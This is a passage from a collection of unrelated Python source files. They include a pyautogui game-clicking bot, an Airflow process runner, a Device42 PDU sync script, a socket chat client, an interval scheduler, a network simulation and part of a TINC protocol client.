lock.release()
if not output == None:
processOutput(output)
def worker2(lock): #supplies icons
while True:
output = pyautogui.locateOnScreen('supplies1.png', confidence=0.805)
lock.acquire()
print("supplies1:", output)
lock.release()
if output == None:
output = pyautogui.locateOnScreen('supplies2.png', confidence=0.820)
lock.acquire()
print("supplies2:", output)
lock.release()
if not output == None:
processOutput(output)
def worker3(lock): #idle building icons
while True:
output = pyautogui.locateOnScreen('idle1.png', confidence=0.545)
lock.acquire()
print("idle1:", output)
lock.release()
if not output == None:
processIdleOutput(output)
def worker4(lock): #goods boxes icons
while True:
output = pyautogui.locateOnScreen('goods1.png', confidence=0.885)
lock.acquire()
print("goods1:", output)
lock.release()
if not output == None:
processIdleOutput(output)
def worker5(lock): #ingame buttons
suppressESC = False
while True:
output = pyautogui.locateOnScreen('button1.png', confidence=0.800, grayscale=True)
lock.acquire()
print("button1:", output)
lock.release()
if output == None:
output = pyautogui.locateOnScreen('button2.png', confidence=0.800, grayscale=True)
lock.acquire()
print("button2:", output)
lock.release()
if not output == None:
processButtonOutput(output, suppressESC)
else:
sleep(5)
#multithreading
if collectGold == True:
t1 = threading.Thread(target=worker1, args=(lock,))
t1.start()
if collectSupplies == True:
t2 = threading.Thread(target=worker2, args=(lock,))
t2.start()
if restartIdleBuildings == True:
t3 = threading.Thread(target=worker3, args=(lock,))
t3.start()
if collectGoods == True:
t4 = threading.Thread(target=worker4, args=(lock,))
t4.start()
if pressButtons == True:
t5 = threading.Thread(target=worker5, args=(lock,))
t5.start()
|
multi_process_runner.py
|
import logging
from multiprocessing.context import Process
from airflow_monitor.common import capture_monitor_exception
from airflow_monitor.multiserver.runners.base_runner import BaseRunner
logger = logging.getLogger(__name__)
class MultiProcessRunner(BaseRunner):
JOIN_TIMEOUT = 60
def __init__(self, target, **kwargs):
super(MultiProcessRunner, self).__init__(target, **kwargs)
self.process = None # type: Process
@capture_monitor_exception
def start(self):
self.process = Process(target=self.target, kwargs=self.kwargs)
self.process.start()
@capture_monitor_exception
def stop(self):
if self.process and self.is_alive():
self.process.terminate()
self.process.join(MultiProcessRunner.JOIN_TIMEOUT)
if self.process.is_alive():
self.process.kill()
@capture_monitor_exception
def heartbeat(self):
# do we want to do something here?
pass
@capture_monitor_exception
def is_alive(self):
return self.process.is_alive()
def __str__(self):
s = super(MultiProcessRunner, self).__str__()
return f"{s}({self.process})"
|
mod_d42.py
|
#!/usr/bin/env python
from requests import get as reqget, post as reqpost
from json import loads as jsonloads, dumps as jsondumps
from config import configSystem
from threading import Thread
from res_d42 import D42
import time, sys, os
cfg = configSystem('config.cfg')
# Override
#dccode = ''
dccode = cfg.getConfigValue('pdu', 'dccode')
d42obj = D42(
cfg.getConfigValue('device42', 'd42_api_base'),
cfg.getConfigValue('device42', 'd42_user'),
cfg.getConfigValue('device42', 'd42_pass')
)
#pdudata = d42obj.api_get('/pdus/')['pdus']
def scanner(indata):
if 'serial_number' not in indata:
return False
serial = indata['serial_number']
if 'd42_id' in indata:
if indata['d42_id'] == 0:
return True
updateData = {
# 'name': indata['d42_name'],
'new_name': indata['hostname'],
'asset_no': indata['asset_tag'],
'device_id': indata['d42_id'],
'serial_no': indata['serial_number'],
}
respdevdata = d42obj.api_put('/device/', updateData)
print(updateData)
print(respdevdata)
updatePduData = {
'pdu_id': indata['pdu_id'],
'name': indata['hostname'],
'asset_no': indata['asset_tag'],
}
resppdudata = d42obj.api_put('/pdus/', updatePduData)
print(updatePduData)
print(resppdudata)
exit()
respdata = d42obj.api_get('/devices/all/?limit=50&serial_no=%s' % serial)
if respdata['total_count'] > 0 and len(respdata['Devices']) > 0:
matched = True
matchedObj = respdata['Devices'][0]
if matched:
print('Found S/N in D42: %s' % serial)
data = {
'd42_pdu_mapping_url': matchedObj['pdu_mapping_url'],
'd42_id': matchedObj['device_id'],
'd42_name': matchedObj['name'],
'real_serial': serial,
}
url = '%s/pdu/update' % cfg.getConfigValue('pdu', 'api_base')
r = reqpost(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')}, json=data)
try:
print(r.json())
except ValueError:
print(r.text)
else:
print('S/N not found in D42: %s' % serial)
data = {
'd42_pdu_mapping_url': '',
'd42_id': '',
'd42_name': '',
'real_serial': serial,
}
url = '%s/pdu/update' % cfg.getConfigValue('pdu', 'api_base')
r = reqpost(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')}, json=data)
try:
print(r.json())
except ValueError:
print(r.text)
exit()
url = '%s/pdu/getPduData?dccode=%s&params=d42_id,serial_number,hostname,d42_name,pdu_id,pdu_name,asset_tag' % (cfg.getConfigValue('pdu', 'api_base'), dccode)
r = reqget(url, headers={'SB-Auth-Key': cfg.getConfigValue('pdu', 'api_key')})
resp = r.json()
if 'data' not in resp:
exit()
for data in resp['data']:
if len(data['serial_number']) > 0:
scanner(data)
# t = Thread(target=scanner, args=(data,))
# t.start()
|
client.py
|
import socket
from threading import Thread
class Client:
def __init__(self, server_host="127.0.0.1", server_port=5002, message_size=1024):
"""クライアントです。
Parameters
----------
server_host : str
接続先サーバーのホスト名、またはIPアドレスです。 規定値 "127.0.0.1"
server_port : int
接続先サーバーのポート番号です。 規定値 5002
message_size : int
1回の通信で送れるバイト長。 規定値 1024
"""
self._s_host = server_host
self._s_port = server_port
self._message_size = message_size
# '_s_sock' - (Server socket) the socket connected to the server
self._s_sock = None
# '_s_thr' - (Server thread) thread that receives messages from the server
self._s_thr = None
# Used so that the main thread can also terminate once the server thread has finished
self._is_terminate_server_thread = False
def clean_up(self):
# Close the socket to the server
self._s_sock.close()
# If a thread is still running, it is cleaner to wait for it to finish
if not (self._s_thr is None) and self._s_thr.is_alive():
print("[CleanUp] Before join")
self._s_thr.join()
print("[CleanUp] After join")
self._s_thr = None
def run(self):
def server_worker():
while True:
try:
message = self._s_sock.recv(self._message_size).decode()
print("\n" + message)
if message == "quit":
# We terminate when the server sends "quit"
# Having the server forcibly disconnect would have the same effect, except that no error message is shown
# TODO Note that even if this worker thread stops, the blocking wait on standard input is not released automatically
print(f"""[-] Disconnected by server.""")
self._is_terminate_server_thread = True
return
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
print(
f"""Finished listening to the server.
Please push q key to quit."""
)
self._is_terminate_server_thread = True
return
# initialize TCP socket
self._s_sock = socket.socket()
# connect to the server
print(f"[*] Connecting to {self._s_host}:{self._s_port}...")
self._s_sock.connect((self._s_host, self._s_port))
print("[+] Connected.")
# make a thread that listens for messages to this client & print them
self._s_thr = Thread(target=server_worker)
# make the thread daemon so it ends whenever the main thread ends
self._s_thr.daemon = True
# start the thread
self._s_thr.start()
while not self._is_terminate_server_thread:
# input message we want to send to the server
to_send = input() # Blocks here; there is no simple way to release this block from within the program
# a way to exit the program
if to_send.lower() == "q":
break
to_send = f"{to_send}"
# finally, send the message
self._s_sock.send(to_send.encode())
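# Usage sketch (not part of the original module): connect to a locally running
# server, type messages, and enter "q" to quit.
if __name__ == "__main__":
    client = Client(server_host="127.0.0.1", server_port=5002)
    try:
        client.run()
    finally:
        client.clean_up()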
|
interval_scheduler.py
|
# XXX Rename this to "interval_scheduler.py" and delete the old file after this is confirmed to work for both async and regular routines
# XXX Rename this class to reflect that it runs the same routine at an interval
from datetime import timedelta
from typing import Callable
import threading
import time
import logging
import asyncio
class IntervalScheduler:
"""
Runs a routine at an interval out of the calling thread
"""
HIGH_PRIORITY = 0
def __init__(self, routine: Callable, interval: timedelta, logger=logging):
self.routine = routine
self.interval_seconds = interval.total_seconds()
self.t_helper = threading.Thread(target=self.__run)
self.should_exit = False
self.logger = logger
self._has_finished = False
def __run(self):
"""
The core logic of the scheduler that also calls the scheduler's routine.
"""
asyncio.run(self.__loop())
async def __loop(self):
while not self.should_exit:
result = self.routine()
if asyncio.iscoroutine(result):
await result
await asyncio.sleep(self.interval_seconds)
self._has_finished = True
self.logger.info("Scheduler exited succesfully!")
def start(self):
self.t_helper.start()
def stop(self):
self.should_exit = True
def has_finished(self):
return self._has_finished
def running(self):
"""
Returns whether start() has been called before a stop()
"""
return self.t_helper.is_alive()
# I used this as a manual test since it was quicker than writing unit-tests. HarHarHar
if __name__ == "__main__":
squak = lambda: print("Caaw!")
scheduler = IntervalScheduler(
routine=squak, interval=timedelta(seconds=1)
)
scheduler.start()
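    # Let the routine fire a few times, then shut the scheduler down and confirm
    # that the worker thread exited (extends the manual test above).
    time.sleep(3.5)
    scheduler.stop()
    scheduler.t_helper.join()
    print("has_finished:", scheduler.has_finished())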
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_1
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
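#resulting topology: client (host 1) --intf 0--> router A --intf 0--> server (host 2), MTU 50 on both links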
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
tinc_client.py
|
from enum import auto
import threading
import time
import socket  # also used for gethostname()
from tinc.variant import VariantType
from typing import List, Any
import struct
from threading import Lock
# TINC imports
from .parameter import Parameter, ParameterString, ParameterInt, ParameterChoice, ParameterBool, ParameterColor, Trigger, ParameterVec
from .processor import ProcessorCpp, ProcessorScript, ComputationChain
from .datapool import DataPool
from .parameter_space import ParameterSpace
from .disk_buffer import *
from .cachemanager import *
from .message import Message
from . import tinc_protocol_pb2 as TincProtocol
#from google.protobuf import any_pb2 #, message
tinc_client_version = 1
tinc_client_revision = 0
commands = {
"HANDSHAKE" : 0x01,
"HANDSHAKE_ACK" : 0x02,
"GOODBYE" : 0x03,
"GOODBYE_ACK" : 0x04,
"PING" : 0x05,
"PONG" : 0x06,
}
class TincTimeout(ValueError):
def __init__(self, arg):
self.strerror = arg
self.args = {arg}
class TincClient(object):
def __init__(self, server_addr: str = "localhost",
server_port: int = 34450, auto_connect = True):
self.connected = False
self.parameters = []
self.processors = []
self.datapools = []
self.disk_buffers = []
self.parameter_spaces = []
self.request_timeout = 10.0
self.pending_requests = {}
self.pending_requests_count = 1
self.pending_replies = {}
self.request_count_lock = Lock()
self.pending_requests_lock = Lock()
self.pending_lock = Lock()
self._barrier_queues_lock = Lock()
self._barrier_requests = []
self._barrier_unlocks = []
self.barrier_wait_granular_time_ms = 20
self.server_version = 0
self.server_revision = 0
self._log = []
self.debug = False
self._server_status = TincProtocol.StatusTypes.UNKNOWN
if auto_connect:
self.start(server_addr, server_port)
def __del__(self):
self.stop()
print("Stopped")
def start(self, server_addr = "localhost", server_port = 34450):
# self.pserver = pserver
self.serverAddr = server_addr
self.serverPort = server_port
self.running = True
self.x = threading.Thread(target=self._server_thread_function, args=(self.serverAddr,self.serverPort))
self.x.start()
def stop(self):
if self.running:
self.send_goodbye()
self.running = False
self.connected = False
self.x.join()
self.socket.close()
self.socket = None
self.server_version = 0
self.server_revision = 0
def server_status(self):
return self._server_status
def barrier(self, group = 0, timeout_sec = 0):
with self._barrier_queues_lock:
# first flush all requests that match unlocks
matched_unlocks = []
for unlock in self._barrier_unlocks:
if self._barrier_requests.count(unlock) > 0:
self._barrier_requests.remove(unlock)
matched_unlocks.append(unlock)
for matched in matched_unlocks:
if self._barrier_unlocks.count(matched) > 0:
self._barrier_unlocks.remove(matched)
print("-----",len(self._barrier_requests))
if len(self._barrier_requests) > 1:
print("Unexpected inconsistent state in barrier. Aborting and flushing barriers.")
self._barrier_requests.clear()
self._barrier_unlocks.clear()
return False
timems = 0.0
current_consecutive = 0
while timems < (timeout_sec * 1000) or timeout_sec == 0:
if (self._barrier_queues_lock.acquire(False)):
if len(self._barrier_requests) > 0:
current_consecutive = self._barrier_requests[0]
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.BARRIER_ACK_LOCK
msg.objectType = TincProtocol.GLOBAL
comm = TincProtocol.Command()
comm.message_id = current_consecutive
msg.details.Pack(comm)
self._send_message(msg)
self._barrier_requests.remove(current_consecutive)
self._barrier_queues_lock.release()
break
self._barrier_queues_lock.release()
time.sleep(self.barrier_wait_granular_time_ms* 0.001)
timems += self.barrier_wait_granular_time_ms
if timems > (timeout_sec * 1000) and timeout_sec != 0.0:
# Timeout.
return False
# Now wait for unlock
timems = 0.0
while timems < (timeout_sec * 1000) or timeout_sec == 0:
if (self._barrier_queues_lock.acquire(False)):
if self._barrier_unlocks.count(current_consecutive) > 0:
self._barrier_unlocks.remove(current_consecutive)
self._barrier_queues_lock.release()
break
self._barrier_queues_lock.release()
time.sleep(self.barrier_wait_granular_time_ms* 0.001)
timems += self.barrier_wait_granular_time_ms
print("Exit client barrier")
return timems < (timeout_sec * 1000) or timeout_sec == 0
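    # Usage sketch (illustrative): block until every participant reaches the same
    # barrier, giving up after 10 seconds:
    #   if client.barrier(timeout_sec=10):
    #       ...  # all peers acknowledged the barrier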
def wait_for_server_available(self, timeout = 3000.0):
time_count = 0.0
wait_granularity = 0.1
while self._server_status != TincProtocol.StatusTypes.AVAILABLE:
time.sleep(wait_granularity)
time_count += wait_granularity
if time_count > timeout:
raise TincTimeout("Server still busy after timeout")
# Access to objects by id
def get_parameter(self, parameter_id, group = None):
for p in self.parameters:
if p.id == parameter_id and group is None:
return p
elif p.id == parameter_id and p.group == group:
return p
return None
def get_parameters(self, group = None):
params = []
for p in self.parameters:
if group is None or p.group == group:
params.append(p)
return params
def get_processor(self, processor_id):
for p in self.processors:
if p.id == processor_id:
return p
return None
def get_disk_buffer(self, db_id):
for db in self.disk_buffers:
if db.id == db_id:
return db
return None
def get_datapool(self, datapool_id):
for dp in self.datapools:
if dp.id == datapool_id:
return dp
return None
def get_parameter_space(self, ps_id):
for ps in self.parameter_spaces:
if ps.id == ps_id:
return ps
return None
# Network message handling
def create_parameter(self, parameter_type, param_id, group = None, min_value = None, max_value = None, space = None, default_value= None, space_representation_type = None):
new_param = parameter_type(param_id, group, default_value = default_value, tinc_client = self)
new_param = self.register_parameter(new_param)
if not min_value is None:
# avoid callbacks
new_param._minimum = min_value
if not max_value is None:
# avoid callbacks
new_param._maximum = max_value
if not space_representation_type is None:
new_param.space_representation_type = space_representation_type
if type(space) == dict:
new_param.ids = space.values()
new_param.values = space.keys()
elif type(space) == list:
new_param.ids = []
new_param.values = space
if self.connected:
self._register_parameter_on_server(new_param)
self.send_parameter_meta(new_param)
return new_param
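    # Example (illustrative): create a float parameter with a bounded range:
    #   client.create_parameter(Parameter, "alpha", group="vis",
    #                           min_value=0.0, max_value=1.0, default_value=0.5)
    # The parameter is registered locally and, when connected, on the TINC server.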
def remove_parameter(self, param_id, group = None):
if not type(param_id) == str:
group = param_id.group
param_id = param_id.id
# TODO complete implementation
return
def register_parameter(self, new_param):
for p in self.parameters:
if p.id == new_param.id and p.group == new_param.group:
if self.debug:
print(f"Parameter already registered: {new_param.id}")
return p
self.parameters.append(new_param)
return new_param
def send_parameter_value(self, param):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.VALUE
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.value
elif type(param) == ParameterString:
value.valueString = param.value
elif type(param) == ParameterChoice:
value.valueUint64 = param.value
elif type(param) == ParameterInt:
value.valueInt32 = param.value
elif type(param) == ParameterColor:
r = TincProtocol.ParameterValue()
g = TincProtocol.ParameterValue()
b = TincProtocol.ParameterValue()
a = TincProtocol.ParameterValue()
r.valueFloat = param.value[0]
g.valueFloat = param.value[1]
b.valueFloat = param.value[2]
a.valueFloat = param.value[3]
value.valueList.extend([r,g,b,a])
elif type(param) == ParameterVec:
for v in param.value:
v_ = TincProtocol.ParameterValue()
v_.valueFloat = v
value.valueList.extend([v_])
elif type(param) == ParameterBool or type(param) == Trigger:
value.valueBool = param.value
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
def send_parameter_meta(self, param, fields = None):
if fields is None:
fields = ("minimum", "maximum", "space", "space_representation_type")
# Minimum
if "minimum" in fields:
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.MIN
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
value.valueUint64 = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterInt:
value.valueInt32 = param.minimum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
if "maximum" in fields:
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.MAX
value = TincProtocol.ParameterValue()
# TODO implement all types
if type(param) == Parameter:
value.valueFloat = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
value.valueUint64 = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterInt:
value.valueInt32 = param.maximum
config.configurationValue.Pack(value)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
if "space_representation_type" in fields:
self.send_parameter_space_type(param)
if "space" in fields:
self.send_parameter_space(param)
def send_parameter_space_type(self, param):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.SPACE_TYPE
type_value = TincProtocol.ParameterValue()
type_value.valueInt32 = int(param.space_representation_type)
config.configurationValue.Pack(type_value)
msg.details.Pack(config)
self._send_message(msg)
def send_parameter_space(self, param):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.PARAMETER
config = TincProtocol.ConfigureParameter()
config.id = param.get_osc_address()
config.configurationKey = TincProtocol.ParameterConfigureType.SPACE
space_values = TincProtocol.ParameterSpaceValues()
if len(param.ids) != len(param.values) and len(param.ids) != 0:
print("ERROR parameter ids-values mismatch, not sending to remote")
return
# TODO implement all types
if type(param) == Parameter:
packed_vals = []
for v in param.values:
new_val = TincProtocol.ParameterValue()
new_val.valueFloat = v
packed_vals.append(new_val)
if len(param.ids) > 0:
space_values.ids.extend(param.ids)
space_values.values.extend(packed_vals)
config.configurationValue.Pack(space_values)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterString:
pass
elif type(param) == ParameterChoice:
pass
elif type(param) == ParameterInt:
packed_vals = []
for v in param.values:
new_val = TincProtocol.ParameterValue()
new_val.valueInt32 = int(v)
packed_vals.append(new_val)
space_values.ids.extend(param.ids)
space_values.values.extend(packed_vals)
config.configurationValue.Pack(space_values)
msg.details.Pack(config)
self._send_message(msg)
elif type(param) == ParameterColor:
pass
elif type(param) == ParameterBool or type(param) == Trigger:
pass
def _register_parameter_on_server(self, param):
details = TincProtocol.RegisterParameter()
details.id = param.id
details.group = param.group
if type(param) == Parameter:
details.dataType = TincProtocol.PARAMETER_FLOAT
details.defaultValue.valueFloat = param.default
if type(param) == ParameterString:
details.dataType = TincProtocol.PARAMETER_STRING
details.defaultValue.valueString = param.default
if type(param) == ParameterInt:
details.dataType = TincProtocol.PARAMETER_INT32
details.defaultValue.valueInt32 = param.default
if type(param) == ParameterChoice:
details.dataType = TincProtocol.PARAMETER_CHOICE
details.defaultValue.valueUint64 = param.default
if type(param) == ParameterBool:
details.dataType = TincProtocol.PARAMETER_BOOL
details.defaultValue.valueBool = param.default
if type(param) == Trigger:
details.dataType = TincProtocol.PARAMETER_TRIGGER
details.defaultValue.valueBool = False
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.MessageType.REGISTER
msg.objectType = TincProtocol.ObjectType.PARAMETER
msg.details.Pack(details)
self._send_message(msg)
def _register_parameter_from_message(self, details):
if details.Is(TincProtocol.RegisterParameter.DESCRIPTOR):
details_unpacked = TincProtocol.RegisterParameter()
details.Unpack(details_unpacked)
name = details_unpacked.id
group = details_unpacked.group
param_type = details_unpacked.dataType
if self.debug:
print(f"Register parameter {name} {group} {param_type}")
if param_type == TincProtocol.PARAMETER_FLOAT :
new_param = Parameter(name, group, default_value = details_unpacked.defaultValue.valueFloat, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_BOOL:
new_param = ParameterBool(name, group, default_value = details_unpacked.defaultValue.valueBool, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_STRING :
new_param = ParameterString(name, group, default_value = details_unpacked.defaultValue.valueString, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_INT32 :
new_param = ParameterInt(name, group, default_value = details_unpacked.defaultValue.valueInt32, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_VEC3F :
new_param = ParameterVec(name, group, 3, tinc_client=self)
elif param_type == TincProtocol.PARAMETER_VEC4F :
new_param = ParameterVec(name, group, 4, tinc_client=self)
elif param_type == TincProtocol.PARAMETER_COLORF :
l = [v.valueFloat for v in details_unpacked.defaultValue.valueList]
new_param = ParameterColor(name, group, default_value = l, tinc_client =self)
elif param_type == TincProtocol.PARAMETER_POSED :
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_MENU :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_CHOICE :
new_param = ParameterChoice(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
pass
elif param_type == TincProtocol.PARAMETER_TRIGGER :
new_param = Trigger(name, group)
pass
elif param_type == TincProtocol.PARAMETER_INT64 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_INT16 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_INT8 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT64 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT32 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT16 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_UINT8 :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
elif param_type == TincProtocol.PARAMETER_DOUBLE :
#new_param = ParameterM(name, group, default_value = details_unpacked.defaultValue.valueUint64, tinc_client =self)
new_param = None
pass
else:
new_param = None
if new_param:
self.register_parameter(new_param)
if self.debug:
print("Parameter already registered.")
else:
print(f"Unsupported parameter type for id: {name} group: {group}")
else:
print("ERROR: Unexpected payload in REGISTER PARAMETER")
def _configure_parameter_from_message(self, details):
if not details.Is(TincProtocol.ConfigureParameter.DESCRIPTOR):
print("ERROR unexpected paylod in Configure parameter. Aborting.")
return
param_details = TincProtocol.ConfigureParameter()
details.Unpack(param_details)
param_osc_address = param_details.id
param_command = param_details.configurationKey
configured = True
if self.debug:
print(f"_configure_parameter_from_message {param_osc_address} {param_command}")
for param in self.parameters:
if param.get_osc_address() == param_osc_address:
if param_command == TincProtocol.ParameterConfigureType.VALUE:
configured = configured and param.set_value_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.MIN:
configured = configured and param.set_min_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.MAX:
configured = configured and param.set_max_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.SPACE:
configured = configured and param.set_space_from_message(param_details.configurationValue)
elif param_command == TincProtocol.ParameterConfigureType.SPACE_TYPE:
configured = configured and param.set_space_representation_type_from_message(param_details.configurationValue)
else:
print("Unrecognized Parameter Configure command")
if self.debug:
print("_configure_parameter_from_message done")
if not configured:
print("Parameter configuration failed")
# ParameterSpace messages ------------------
def register_parameter_space(self, new_ps):
found = False
for ps in self.parameter_spaces:
if ps.id == new_ps.id:
if self.debug:
print(f"ParameterSpace already registered: '{new_ps.id}'")
found = True
break
if not found:
self.parameter_spaces.append(new_ps)
#print(f"REGISTER ParameterSpace: '{new_ps}'")
def _register_parameter_space_from_message(self, details):
# print('register ps')
if details.Is(TincProtocol.RegisterParameterSpace.DESCRIPTOR):
ps_details = TincProtocol.RegisterParameterSpace()
details.Unpack(ps_details)
ps_id = ps_details.id
self.register_parameter_space(ParameterSpace(ps_id, tinc_client = self))
def _configure_parameter_space_from_message(self, details):
param_details = TincProtocol.ConfigureParameterSpace()
details.Unpack(param_details)
ps_id = param_details.id
configured = True
if self.debug:
print("Processing _configure_parameter_space_from_message")
for ps in self.parameter_spaces:
if ps_id == ps.id:
ps_command = param_details.configurationKey
if ps_command == TincProtocol.ParameterSpaceConfigureType.ADD_PARAMETER:
param_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(param_value)
param_id = param_value.valueString
for p in self.parameters:
if p.get_osc_address() == param_id:
if self.debug:
print(f"Registering {param_id} for {ps}")
ps.register_parameter(p)
configured = True
break
elif ps_command == TincProtocol.ParameterSpaceConfigureType.REMOVE_PARAMETER:
param_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(param_value)
param_id = param_value.valueString
for p in self.parameters:
if p.get_osc_address() == param_id:
ps.remove_parameter(p)
configured = True
break
elif ps_command == TincProtocol.ParameterSpaceConfigureType.CURRENT_TEMPLATE:
template_val = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(template_val)
if template_val.nctype == VariantType.VARIANT_STRING:
# Use internal member to avoid checks and warnings in the setter function
ps._path_template = template_val.valueString
else:
print("ERROR: Unexpected data type for TincProtocol.ParameterSpaceConfigureType.CURRENT_TEMPLATE")
elif ps_command == TincProtocol.ParameterSpaceConfigureType.ROOT_PATH:
root_value = TincProtocol.ParameterValue()
param_details.configurationValue.Unpack(root_value)
if root_value.nctype == VariantType.VARIANT_STRING:
# Use internal member to avoid checks and warnings in the setter function
ps._local_root_path = root_value.valueString
else:
print("ERROR: Unexpected data type for TincProtocol.ParameterSpaceConfigureType.ROOT_PATH")
elif ps_command == TincProtocol.ParameterSpaceConfigureType.CACHE_PATH:
dist_path = TincProtocol.DistributedPath()
param_details.configurationValue.Unpack(dist_path)
if ps._cache_manager is None:
ps._cache_manager = CacheManager(dist_path.relativePath)
if dist_path.filename != ps._cache_manager._metadata_file:
print(f"Unexpected cache filename: {dist_path.filename}. Expected: {ps._cache_manager._metadata_file}")
ps._cache_manager._cache_root = dist_path.rootPath
ps._cache_manager._cache_dir = dist_path.relativePath
ps._cache_manager._metadata_file = dist_path.filename
else:
ps._cache_manager._cache_root = dist_path.rootPath
ps._cache_manager._cache_dir = dist_path.relativePath
ps._cache_manager._metadata_file = dist_path.filename
else:
print("Unrecognized ParameterSpace Configure command " + str(ps_command))
if not configured:
print("ParameterSpace configuration failed")
def register_processor(self, message):
if message.Is(TincProtocol.RegisterProcessor.DESCRIPTOR):
proc_details = TincProtocol.RegisterProcessor()
message.Unpack(proc_details)
processor_type = proc_details.type
proc_id = proc_details.id
# print(name)
input_dir = proc_details.inputDirectory
# print(input_dir)
input_files = proc_details.inputFiles
# print(input_files)
output_dir = proc_details.outputDirectory
# print(output_dir)
output_files = proc_details.outputFiles
# print(output_files)
running_dir = proc_details.runningDirectory
# print(running_dir)
if processor_type == TincProtocol.CPP:
new_processor = ProcessorCpp(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
elif processor_type == TincProtocol.DATASCRIPT:
new_processor = ProcessorScript(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
elif processor_type == TincProtocol.CHAIN:
new_processor = ComputationChain(proc_id, input_dir, input_files, output_dir, output_files, running_dir)
else:
new_processor = None
print(f"Unexpected processor type {processor_type}")
